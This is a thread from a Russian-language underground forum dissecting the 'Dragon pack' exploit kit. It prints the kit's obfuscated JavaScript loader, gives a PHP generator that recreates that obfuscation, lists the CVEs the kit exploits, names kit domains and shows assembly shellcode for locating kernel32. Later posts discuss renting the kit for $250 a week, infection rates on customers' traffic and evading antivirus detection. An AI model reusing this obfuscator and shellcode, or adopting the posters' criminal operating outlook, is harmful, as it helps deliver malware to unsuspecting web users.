Статья Dragon pack

[GOONER]

Доброго времени суток уважаемые мемберы damagelab!!!
Захотел разобрать сэмпл Dragon pack, который был снят in the wild.
Исследование будет проводиться с User Agent:Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)

<script src='src.js'></script><script src='dest.js'></script><script>var NDotmhh0=['n','e','G','j','y','v','E','l','p','K','u','a','z','O','l','l'];var dLnOQO=NDotmhh0[1]+NDotmhh0[5]+NDotmhh0[11]+NDotmhh0[14];var vob=dLnOQO;var BuBu=this;var kD=BuBu[vob];var Un=new String('unescape');var Unes=BuBu[Un];var strochka='L2pL2_L2cLWHL2BL2HL2mLW......';var ret='';var ij;var index;for(ij=0;ij<strochka.length;ij++){index=desttable.indexOf(strochka.charAt(ij));if(index>-1){ret+=srctable.charAt(index);}}kD(Unes(ret));</script>

Как же разобрать такой кодес?Да запросто=/
Посмотрим внимательно и достанем ещё 2 переменные (с dest.js и src.js)

var srctable='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%';

и

var desttable='SP%cpH2W5C83fEX:1rjF9AQdMlKi/sk4GuvtxJOBm_U.NqzY7aw&nhgZoVT=0IbRDye?6-L';

Как видно из кодеса

var NDotmhh0=['n','e','G','j','y','v','E','l','p','K','u','a','z','O','l','l'];
 var dLnOQO=NDotmhh0[1]+NDotmhh0[5]+NDotmhh0[11]+NDotmhh0[14];
 var vob=dLnOQO;
 var BuBu=this;
 var kD=BuBu[vob];
 var Un=new String('unescape');
 var Unes=BuBu[Un];

kD(Unes(ret)); сводиться к this.eval(this.unescape(ret));
Хотелось бы отметить, что нет обфускации переменных "на лету".
Вообщем вариация на php, с моими "поправками"=)

Спойлер: 40

<?php
function get_rand_var($len) {

    $alpha = 'abcdefghijklmnopqrstuvwxyz';
    $digit = '0123456789';
    $rnd = substr(str_shuffle($alpha), 0, 1);

    for( $i = 0; $i < $len; $i++ ) {         
        $r_str = str_shuffle(strtolower($alpha) . strtoupper($alpha) . $digit);
        $rnd.=$r_str[mt_rand(0,61)];
    }
    
return $rnd; 
}

function replace ($string) {
    
    $string = str_replace("\r" ," ", $string);
    $string = str_replace("\n" ," ", $string);
    $string = str_replace("\t" ," ", $string);

return $string;
}
 
function ascii2hex($ascii) {

    $hex = '';

    for ($i = 0; $i < strlen($ascii); $i++) {
        $byte = strtoupper(dechex(ord($ascii{$i})));
        $byte = str_repeat('0', 2 - strlen($byte)).$byte;
        $hex.='%'.$byte;
    }
    
return $hex;
}

function encrypt($string,$key,$srctable) {
    
    for($i=0;$i<strlen($string);$i++) {
        $o=$string[$i];
        $m=strpos($srctable,$o);
    
        if($m>-1){
            $out .= $key[$m];
        } else {
            $out.=$o;
    
        }
    }
    
return $out;
}
$key = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%';
$key = str_shuffle($key);
$srctable = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%";
$srctable = str_shuffle($srctable);

$script = "document.write('xss.pro/');";

$script= ascii2hex($script);
$script = encrypt($script,$key,$srctable);

for ($i = 0; $i <= 17; $i++) {
  $rnd_var[$i] = get_rand_var(mt_rand(3,7));
}

$js='var '. $rnd_var[0] .'=[\'n\',\'e\',\'G\',\'j\',\'y\',\'v\',\'E\',\'l\',\'p\',\'K\',\'u\',\'a\',\'z\',\'O\',\'l\',\'l\'];
var '. $rnd_var[1] .'='. $rnd_var[0] .'[1]+'. $rnd_var[0] .'[5]+'. $rnd_var[0] .'[11]+'. $rnd_var[0] .'[14];
var '. $rnd_var[2] .'='. $rnd_var[1] .';
var '. $rnd_var[3] .'=this;
var '. $rnd_var[4] .'='. $rnd_var[3] .'['. $rnd_var[2] .'];
var '. $rnd_var[5] .'=new String(\'unescape\');
var '. $rnd_var[6] .'='. $rnd_var[3] .'['. $rnd_var[5] .'];
var '. $rnd_var[7] .'=\''. $script .'\';
var '. $rnd_var[8] .'=\'\';
var '. $rnd_var[9] .';
var '. $rnd_var[10] .';
var '. $rnd_var[11] .'=\''. $srctable .'\';
var '. $rnd_var[12] .'=\''. $key .'\';
for('. $rnd_var[9] .'=0;'. $rnd_var[9] .'<'. $rnd_var[7] .'.length;'. $rnd_var[9] .'++){
'. $rnd_var[10] .'='. $rnd_var[12] .'.indexOf('. $rnd_var[7] .'.charAt('. $rnd_var[9] .'));
if('. $rnd_var[10] .'>-1){'. $rnd_var[8] .'+='. $rnd_var[11] .'.charAt('. $rnd_var[10] .');}}
'. $rnd_var[4] .'('. $rnd_var[6] .'('. $rnd_var[8] .'));';    

 $js = replace($js); 
 
 echo "<html><script>".$js."</script></html>";
?>

Ну что ж?! Соберем все воедино и получим готовый скрипт для malzill'ы, согласимся с заменой eval и вуаля=)

Или для любителей Chrome:

console.log(Unes(ret))

Как видно из кодеса под данный user-agent выдаются следующие сплоиты: javasmb(CVE-2010-0746), java(CVE-2010-0840), snapshot(CVE-2008-2463), iepeers(CVE-2010-0806)
Далее, по очереди, разберем pdf, который только под ASCII85Decode

pdfdigger.bat -f 72b89x.pdf

Сразу видно, что используються Collab.collectEmailInfo(Bugtraq ID:27641), util.printf(Bugtraq ID:30035), getIcon(Bugtraq ID:34169), newPlayer(Bugtraq ID:37331)..
Так же, крипт pdf очень напоминает siberia exploit pack=/
Расшифровка сводиться к удалении сепаратора (в данном случае HHYRT)

Ничего интересного-проверка версии и эксплуатация уязвимостей...
Далее джава сплоит(СVE-2010-0840)

Уже после разбора сабжа, я наткнулся на открытую, на доступ из вне, папку с названием /devka...

И смог посмотреть на админку, которая была без авторизации..

И на гостевую статистику(gost.php).

Спойлер: 40

Все файлы можна скачать тут
pass:damagelab

 

[TrueUser]

Гунер молодец, расколупал новое чудище, правда огорчают очень орфографические ошибки в тексте . Админка конечно убожество, но судя по пробиву - траф сливали очень неплохой на нее

 

[Chococream]

Спойлер: 40

Респект, тоже ковырял Dragon Pack(шк можно из приват раздела взять).
nicobelickloh.co.cc -
pokityus.co.cc/pbcce/ - прикрыли

Очень много кода слизано с Элеоноры, а крипт - на Siberia совсем не смахивает, т.к она славится(моё мнение) большим кол-вом трэша(комментарии, переменные) в коде. Возможно я смотрел версию чуть раннюю... вообщем не суть.

Спойлер: 6

P.S:
Реверс шк ничего нового не показал. Получаем темп диру, качаем при помощи urlmon.dll (urldownloadtofile), запускаем скачанный файл и завершаем трэд(ExitThread).
Получение win32 базы заточено под Win7.

;FASM syntax

xor eax, eax
mov eax, dword [fs:EAX+030h]
JS @win9x

mov eax, dword [eax+0Ch]
mov eax, dword [eax+014h]
mov eax, dword [eax]; get the next entry (2nd entry)
mov eax, dword [eax]; get the next entry (3rd entry)
mov ebx, dword [eax+010h]; get the 3rd entries base address (kernel32.dll)
JMP @next

@win9x:; если 9x
mov eax, dword [eax+34h]
lea eax, dword [eax+7ch]
mov ebx, dword [eax+3ch]
@next:

 

[GOONER]

...огорчают очень орфографические ошибки в тексте

Сорри, просто делалось все поздно, с фонариком на лбу
Подправил....

Спойлер: 40

nicobelickloh.co.cc

меня тоже очень улыбнуло

 

[greenzy]

GOONER респект!

 

[maximka2010]

ребят - я являюсь тем кто сдает в аренду данный пак - в данный момент могу сказать что авка полностью изменился - таких реверсов просто не будет
дабы избежать делитантов которыер реверсят и потом выкладывают - были отменены бесплвтные тесты - минимлный срок пренду неделя - стоимость 250 бакарей.

сибирия про которую вы пишите в настоящий момент - посмотрите на гугл - он а в топе по блек листам веня рузучлся чистить не говоря о пдф - даже джаву...(сори за офтоп)

я уже привы что кто то что то сливает с моей свяи и выдает за свое.
в настоязмй момент - работаю только с постоянными клиентами.
спасибо за внимание.

 

[TrueUser]

maximka2010
Я как бы считаю, что получить реверс в подарок - это очень неплохо, если бы ты стукнул кому то из наших проверяющих и попросил реверс с обзором, тогда бы во первых ты получил более полную информацию, во вторых пока длились бы тесты - мог бы пофиксить часть найденных багов и они не попали бы на глаза твоим потенциальным арендаторам-покупателям. Благо обзоры у нас пока бесплатные
Это относится ко всем авторам продуктов, чье добро так или иначе попадает в операционную DL

 

[maximka2010]

все ошибки учтены и профиксены.
с завтрешнего дня будет совершенно другой пак (как образно так и фукционально)

введено верификация по логину и пасу
и закрыты вышеуказанные дыры.

 

[tomash]

Пробовал эту связку
Правда не в той конфигурации, которая описана выше
Похоже владельцы много чего изменили
- Морда стала аскетичной
- Есть авторизация на входе в админку
- В корень швыряют хтакцесс с плохими айпишками, помогает он аль нет - трудно сказать
- Устойчиво работает либтифф, причем он постоянно чистый
- Работает три джавы, в одной линк зашит внутрь, в остальных - закодированы снаружи. То есть хрени в виде открытых ссылок на скачку экзэ не видно
- Древние пдфные сплоиты, типа коллаба и иже с ним - тоже всегда чистые
Недостатки:
- Упорно не хотят ставить хцп, ссылаются на то, что он хреново чистится
- Нет пирса и снапшота, хотя утверждали обратное
На сотне тонн моего трафа пробив был около 20 процентов (штаты)
Отстук не очень - 60-65%
Хз, грешили на экзэ
Не знаю вот..
Для сравнения лил на конкурентную, не скажу - чью, связку - пробив 15, отстук 70, джава загрязнилась через два часа, никто и не рыпнулся чистить
А у этих ребят всегда вроде есть запасная
От элеоноры там ничего нет, от венниной сибири - тоже
Сложилось впечатление что они серфят листы и дергают какие-то решения, потом подгоняют под себя
Она стояла на моем серванте - на внутренности я насмотрелся вдоволь
Выдачу меняют постоянно
Пдфы выдают каждый день - даже если не успели спалиться
Джаву - через день
Хтмлки со сплоитами действительно статичные (говорят - для скорости так хорошо)
Крипт постоянно разный для разных доменов
Домены я менял сам, они давали мне билды под них
Вроде могут сами менять, но мне ихние бесплатные коссы и проча хрень и даром были не нать
Вобщем - на твердую четверку все..
Косяки с хтакцессами правда я сам поправлял
А так - вобщем остался доволен, респект за работу

 

[WennY]

сибирия про которую вы пишите в настоящий момент - посмотрите на гугл - он а в топе по блек листам веня рузучлся чистить не говоря о пдф - даже джаву...(сори за офтоп)

Глупый совсем чтоли? Веня млять чистил год, а в одно ужасное утро вдруг осознал, что забыл, как работает жс и ява? Для танков: связка не поддерживается, хреновочистящий веня с темы съехал, вот и вся морковь. Это раз. И два: я бы на твоем месте вообще не появлялся бы в этом топике, пдф спизжен просто внаглую, кодеры хреновы, научитесь свое что-то делать для начала, потом будете веню учить чистить паки. Причем снято вплоть до комментов, либо серв разобрали, либо мозгов нету даже обфускатор свой наваять.
Chococream, крипт в индексе действительно не мой (спиздели с какой-то другой паки), но вот что касательно пдф, то там сняли все. По ходу его просто перетащили без видных изменений, не понятно только, как его чистят, видно, жопу перемалывают новыми комментами от авастообразных и думают, что жизнь удалась. Чтож, их дело и право (мне насрать уже)

Вот сам пдф: криптованный жс; жс на выходе. Играем в игру "найдите 3 отличия в структуре пдфа с тем, что выложено в топе". Выдача пака слизана почти вся, не удивлюсь, что крипт так же не оригинальный

 

[Gdark]

По ходу его просто перетащили без видных изменений, не понятно только, как его чистят, видно, жопу перемалывают новыми комментами от авастообразных и думают, что жизнь удалась.

не понятно, чем отличается чистка пдф от той же явы, что так сложна.

 

[tomash]

Ну, к слову сказать, в сибири тоже последние джавы были в крысовском исполнении - это рми которая.. Шеллкод в том же пдфе, вместе с функцией XOREncryption - из элеоноры. Вор у вора дубинку упер.
Эти то хоть месячные или годовые лицензии не продают по полштуки мертвых президентов, и, соответственно, швырнуть своих клиентов не могут, по определению. Если только по мелочевке.. Так что тут есть еще кому язык в собственную жопу засовывать, не так ли, Венни?

 

[WennY]

Крыс мне сам свою жаву скидывал, он был не против, ему было как-то пох, я её очистил от крипта и юзал уже дальше. Чистка уже моя была, сам жар - егошный. Шеллкод эксманойз мне так же дал добровольно, умник ты наш. Если быть точнее, то ротатор пдфа и некоторые пдфные сплойты были вообще с фениксовой подачки, и фен мне так же мне их отдал на вполне добровольной основе. Вопросы есть? Если тебе так не ймется, то можешь постучать всем вышеперечисленным людям и подонимать их по этому поводу.

Эти то хоть месячные или годовые лицензии не продают

Интересно, а с каких пор я начал продавать связку да ещё и на временной основе? Может конечно я лунатил по ночам на вхб, но на сколько себя помню, в здравом состоянии я занимался просто арендой, продав буквально 1-2 лицухи некоторым людям, с которыми у меня были относительно доверительные отношения. Была пара эпизодов с барыгами, но и те в основе своей пытались сдать в аренду

 

[tomash]

Да не кипишуй и даже не оправдывайся, дыши ровно, уже давно всем наплевать на твою связку

 

[WennY]

Вы знаете, мне тоже откровенно говоря начхать на мнение некоего томаша с форума, который, по-видимому, лучше всех оснащен информацией о текущей ситуации, раз так громко кидается обвинительными эпитетами, я лишь пытался произвести конструктивную оборону чести (смешно, конечно, вязать такое грозное слово с прогами, распространяющего вирусы...) своего продукта, обвиненного какой-то, извините, выскочкой, в плагиаете. Конечно, ореол плагиативной (и иной) святости за мной не летает, но уж не Вам, сударь, меня судить. Если уж Вы, товарищ, начали этот "наезд", то извольте уходить достойно, а не кидаться едкими ариведерчи, когда по существу нечего ответить, а уйти без "укола" высоко задранный нос не позволяет... И знаете, я дико рад, что мой софт не был так широко известен публике, как например элеонора или феникс, ибо иначе я бы прекратил свою и без того тугоподъемную деятельность гораздо раньше. Мы поняли друг друга или будем дальше тут флудосрач разводить? Если я Вас как-то задел в предыдущем посте - мои искренние соболезнования и извинения... но не нужно теперь на меня кидаться обертками от конфет, пожалуйста

 

[maximka2010]

Жалко что давно меня не было тут ( редко счас появляюсь на форумах даной тематики)
Венечка - лапочка - ты не смотри что я недавно зарегестрирован на форумах, уж поверь я знаю все твои подоплеки и как ты чистишь джаву, а по поводу того что ты там год чистил её- я могу сказать кто тебе ее чистил и из за чего вы с тем человеком разасрались и не нада выстраивать из себя Це-ку.
посмотри молваре - и ужаснись - твая связка в топе....
и уже давненько в топе.


Да кстати вень - чтобы не поднимать бурю в стакане - скажу так - есть несколько (4-5 твоих клиентов) которые постоянно просят чтобы почистить твою связку

причем клиенты которые платят хорошие мани и льют они по 500к-1кк в сутки, и скажи ка что у меня за "хуевые прогеры" почему же они тогда к тебе не обращаются (ведь у них твая "лицуха")



Вень тебе мой совет - соси тапки - и пытайся что то новое поднять - в настоящий момент ты будешь невостребован

так к слову - почитай свои вопросы на експлойте в разделе программирование
там вопросы которые ты задаешь - точь точь такие же которые я задавал народу 4 года назад.

 

[WennY]

а по поводу того что ты там год чистил её- я могу сказать кто тебе ее чистил

Всю связку ОТ И ДО чистил я сам. Приведи мне хоть одного чела, кто мне её чистил. Несешь ахинею просто от фанаря видно

чего вы с тем человеком разасрались

Я помню всех людей, с которыми я поругался. Так вот из них нету даже просто кодеров, не то чтобы ещё и чистить что-то

Да кстати вень - чтобы не поднимать бурю в стакане - скажу так - есть несколько (4-5 твоих клиентов) которые постоянно просят чтобы почистить твою связку

Я пакой не занимаюсь с 2010 года, клоун :lol2: уже ни один раз написал

причем клиенты которые платят хорошие мани и льют они по 500к-1кк в сутки, и скажи ка что у меня за "хуевые прогеры" почему же они тогда к тебе не обращаются (ведь у них твая "лицуха")

:lol2: :lol2: Ещё раз для ослов: Я НЕ ЗАНИМАЛСЯ ПРОДАЖЕЙ ЛИЦУХ ВПРИНИЦИ. Врубаешь? Была пара эпизодов на почве доверительных отношений, не более. В остальном была аренда онли, после слива меня из темы (не могу назвать точную дату, но ещё до нового года) связка умерла, а на говнобарыг мне наплевать. И я ваще сомневаюсь очень, что щас кто-то на неё что-то льет ибо много неактуала, если только уже апдейтить, но мне честно говоря пох, пусть потрошат.

Вень тебе мой совет - соси тапки - и пытайся что то новое поднять - в настоящий момент ты будешь невостребован

Я ушел из чернухи, белым занимаюсь помаленьку. Не считая пары топов об аз, но это так, чисто на досуге поковырять, жс все-таки, родная тема.

так к слову - почитай свои вопросы на експлойте в разделе программирование

Свои вопросы я уже читал, когда их составлял, идиот. Я не стесняюсь незнания чего-либо, и я не заявлял о себе как о сформировавшемся гуру-кодере (в отличие от некоторых "про"), знающем все обо всем, я делал, что умел и пытался извлечь из этого выгоду. Что-то получалось, что-то не очень, было много камней, о которых я сточил ни один зуб, но в целом результатом я доволен. Если бы было много понта, как у тебя - регнул бы левый акк и тупил бы с него, а со своего с каменным лицом апал топик о супер-превад связке.

там вопросы которые ты задаешь - точь точь такие же которые я задавал народу 4 года назад.

Чел, мне наплевать

bresti, тебе бы по-хорошему минус влепить за бессмысленный пост, но спасибо: тупо проглядел тему, ща, благодаря тебе, уведил пост. 18.02.2011 - кстати, днюха была, 18 =)

 

[maximka2010]

Ссори я тут редко бываю, Вень - тупиш тупи дальше.
вышел из биза ну и топай дальше - а по поводу того что ты сам сусам все чистил пизд.... и провакация...

как великий чистильщик может задавать такие тупые вопросы!!!
уходя - напиши правду...

я вот честно скажу - я не чищу связку - для этого есть программеры которые успевают это делать и делают не плохо.
почему ты не можешь признаться то что чистку делал стороний человек - что тут такого то?
удачи в белом бизе (я кстатитоже вдарился в елый биз)

 

[WennY]

вышел из биза ну и топай дальше

Дык я и пытаюсь, это ты тут поднял шухер зачем-то, я лишь отвечаю на претензии. Если я напрямую не занимаюсь чернью, это ещё не значит, что мне теперь и на форумах надо заклеив рот ходить.

а по поводу того что ты сам сусам все чистил пизд.... и провакация...

Да да, и кого же я провоцирую? Судя по количеству авторов, отписавшихся в этом топе - только тебя. Не знаю, чем тебя так цепляет, что существуют ещё на земле люди, способные САМИ делать всю ту работу, на выполнение которой у тебя не хватает способностей и мозгов (во всяком случае складывается такое впечатление, которое, с каждым из твоих молебных постов с просьбой "признаться", что я такой же дятел и не способен был ничего толком почистить, все больше укрепляется)

как великий чистильщик может задавать такие тупые вопросы!!!

я себя таковым не клеймил никогда, попрошу сюда не подмешивать своей личной "импровизации" и "провокации", пожалуйста. И к тому же там вопросы, по большому счете никак не связанные с работой связки и тем более чисткой. Почти все - из области пхп, а не жс или жавы.

уходя - напиши правду...

Уже задолбался посты переписывать с одной и той же мыслью

я вот честно скажу - я не чищу связку - для этого есть программеры которые успевают это делать и делают не плохо.

Я рад за тебя безмерно, и рад за то, что ты нашел в себе силы сознаться в этом гнустном факте из твоей биографии. Извиняюсь за такой откровенный сарказм... Я вообще не понимаю: чо ты так усердствуешь? Твое всеобъемлющая самооценка обезображена тем фактом, что все то, на что не хватило мозгов у тебя, делал один 17-летний пацан, задающий полоумные вопросы в разделе "программирование"? Тебя это смущает или что? Связки - (в текущем положении дел) отнюдь не та сфера деятельности, в которой от кодера требуется много ума и талантом, и если ты не в состоянии даже сплойты - итак уже написанные о обточенные, и выложенные заботливо везде, где только уже можно - переписать не знакомым для аверов образом (в простонародье - почистить), то - это отнюдь не делает это недосягаемым для других.

почему ты не можешь признаться то что чистку делал сторонний человек - что тут такого то?

Для меня и по сей день остается загадкой, почему столько эмоций вызывает тот факт, что чистил все один человек, а не целый мини-штат? Я тебе уже "признался" бесчисленной количество раз, уже во всем, что только можно, осталось разве что покаяться и попросить прощение за инсталл фейк аверов тысячам невинных граждан и попросить взять меня в рай. Но ты все же не можешь никак смириться с моей версией, и прямо-таки вымаливаешь от меня "признание", которое бы подветрдило, что я тоже не не способен нихрена поддерживать и мне все это делали люди, с которыми я был знаком (судя по всему) только в твоих фантазиях.

удачи в белом бизе (я кстатитоже вдарился в елый биз)

Тебе тоже. Будем надеяться хотябы там ты не будешь меня преследовать и выбивать признания в том, что страницы мне оптимизировали вьтнамцы под пражской, а в подвале моего частного дома, сидя на банках с маринованными помидорами, в рабстве пребывает группа трудолюбивых туристов из кореи, каждый день закупающих мне ссылки в сапе (сео, если чо).

 

[Ar3s]

Вам еще не надоело?